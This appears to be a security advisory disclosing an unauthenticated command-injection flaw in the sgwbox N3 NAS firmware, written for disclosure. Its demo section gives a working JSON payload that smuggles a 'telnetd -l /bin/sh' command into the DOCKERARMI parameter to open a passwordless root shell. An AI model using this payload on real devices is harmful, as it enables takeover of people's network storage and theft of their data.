Information

Vendor: sgwbox

Affected products: N3 NAS ≤ V2.0.25

Vendor Homepage: https://mall.sgwbox.com/

Vendor contact information: mailto:box@new1cloud.com

image.png

Description

A vulnerability exists in the sgwbox NAS N3 that allows unauthorized remote command execution. This vulnerability arises from the lack of filtering for dangerous characters, creating a risk of command injection. An unauthenticated attacker can send a specially crafted POST request message to the command interface related to the DOCKER feature, thereby gaining root control of the remote target NAS device.

Details

As can be seen from /usr/sbin/http_eshell_server, the DOCKERARMI command interface does not perform any authentication or verification, and the first parameter of the obtained params is concatenated into the command for execution without any verification.

image.png

Therefore, an unauthorized command injection vulnerability exists here. An attacker could exploit this vulnerability to gain highest control of a remote target NAS device.

Demo

Without authentication, an attacker sends a POST request message in JSON format to the /eshell API interface without any token information. For the DOCKERARMI command interface, a malicious command can be injected into the first parameter of params.

{
  "params": [
    "$(telnetd -l /bin/sh -p 1234)"
  ],
  "cmd": "DOCKERARMI"
}

image.png

Finally, a Telnet service that allows passwordless login can be enabled on port 1234 to obtain the root shell (supreme control) of the remote target NAS device.

image.png

Credit

NASchecker